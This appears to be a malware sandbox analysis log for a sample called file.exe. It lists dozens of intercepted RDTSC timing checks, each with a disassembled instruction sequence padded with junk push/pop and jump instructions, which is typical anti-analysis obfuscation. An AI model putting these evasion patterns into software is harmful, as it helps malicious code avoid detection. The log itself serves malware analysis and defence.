                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9760FA second address: 976149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F7CC902C40Bh 0x0000000c mov ebx, dword ptr [ebp+12487210h] 0x00000012 mov edx, dword ptr [ebp+122D3312h] 0x00000018 add eax, ebx 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F7CC902C408h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 movzx edi, si 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a jo 00007F7CC902C408h 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976149 second address: 97614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97614F second address: 976153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976153 second address: 976186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F7CC8D8AE39h 0x00000014 jmp 00007F7CC8D8AE33h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3410 second address: 9D3416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3416 second address: 9D341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D341E second address: 9D3424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D357B second address: 9D357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F7D second address: 9D3F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F83 second address: 9D3F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F8D second address: 9D3F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F95 second address: 9D3FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDD34 second address: 9DDD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBEC6 second address: 9DBEF5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7CC8D8AE3Dh 0x00000008 jmp 00007F7CC8D8AE37h 0x0000000d push esi 0x0000000e jbe 00007F7CC8D8AE26h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBEF5 second address: 9DBEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBEF9 second address: 9DBEFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBEFF second address: 9DBF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C413h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC0A2 second address: 9DC0A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC374 second address: 9DC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC378 second address: 9DC3A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7CC8D8AE2Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F7CC8D8AE32h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC3A3 second address: 9DC3AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC681 second address: 9DC68B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD1C9 second address: 9DD1DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7CC902C410h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF276 second address: 9DF27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8433 second address: 9E843F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7CC902C406h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E843F second address: 9E8452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7CC8D8AE2Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8452 second address: 9E8457 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E85CF second address: 9E85D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E85D5 second address: 9E85DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E85DB second address: 9E85E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jl 00007F7CC8D8AE26h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8732 second address: 9E873C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7CC902C406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E89FB second address: 9E8A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE34h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8A19 second address: 9E8A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8BD6 second address: 9E8BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7CC8D8AE34h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8BF1 second address: 9E8C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7CC902C406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jg 00007F7CC902C406h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8C09 second address: 9E8C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8C0D second address: 9E8C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8C13 second address: 9E8C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8EE5 second address: 9E8EFF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F7CC902C406h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 push eax 0x00000013 jno 00007F7CC902C406h 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8EFF second address: 9E8F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7CC8D8AE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8F09 second address: 9E8F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2688 second address: 9F268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F095E second address: 9F0962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C1A second address: 9F0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C1E second address: 9F0C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C2A second address: 9F0C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C2E second address: 9F0C36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F101A second address: 9F1025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1170 second address: 9F1175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F12E4 second address: 9F12EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1455 second address: 9F145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F145E second address: 9F1462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F15B6 second address: 9F15E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7CC902C416h 0x00000008 push ecx 0x00000009 jbe 00007F7CC902C406h 0x0000000f jnp 00007F7CC902C406h 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F15E3 second address: 9F15FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE2Eh 0x00000009 pop edi 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1D74 second address: 9F1D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1D7B second address: 9F1D8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7CC8D8AE2Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007F7CC8D8AE26h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24D7 second address: 9F24DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24DD second address: 9F24E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7CC8D8AE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24E7 second address: 9F24F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F7CC902C406h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24F9 second address: 9F2527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F7CC8D8AE32h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0369 second address: 9F0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7CC902C406h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F59 second address: 9F6F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jp 00007F7CC8D8AE26h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F6E second address: 9F6F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C413h 0x00000007 ja 00007F7CC902C406h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F8B second address: 9F6F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F91 second address: 9F6F9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7CC902C406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAC5B second address: 9FAC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAC61 second address: 9FAC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD89 second address: A0CDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F7CC8D8AE2Eh 0x0000000a jmp 00007F7CC8D8AE32h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F7CC8D8AE38h 0x00000016 pushad 0x00000017 jmp 00007F7CC8D8AE34h 0x0000001c jmp 00007F7CC8D8AE2Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18829 second address: A18845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007F7CC902C40Bh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18845 second address: A18849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CA75 second address: A1CA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25A4D second address: A25A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25A51 second address: A25A64 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7CC902C406h 0x00000008 jng 00007F7CC902C406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2435F second address: A24369 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24369 second address: A24375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7CC902C406h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24375 second address: A24398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE39h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2476B second address: A2477C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24B75 second address: A24B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25724 second address: A25755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C412h 0x00000009 jmp 00007F7CC902C415h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28811 second address: A28821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F7CC8D8AE26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28407 second address: A2842E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C419h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F7CC902C40Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B9B2 second address: A2B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A313F4 second address: A31413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F7CC902C416h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31413 second address: A3142A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3142A second address: A31434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7CC902C406h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31434 second address: A31438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31438 second address: A31441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31441 second address: A31463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE33h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34DC7 second address: A34DE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7CC902C40Dh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F7CC902C406h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45F69 second address: A45F73 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57DD5 second address: A57DDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57DDB second address: A57DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56CCC second address: A56CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56DFD second address: A56E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56F6C second address: A56F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7CC902C406h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57533 second address: A5753C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5753C second address: A57541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57541 second address: A57549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57AAC second address: A57AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7CC902C40Ch 0x00000010 rdtsc
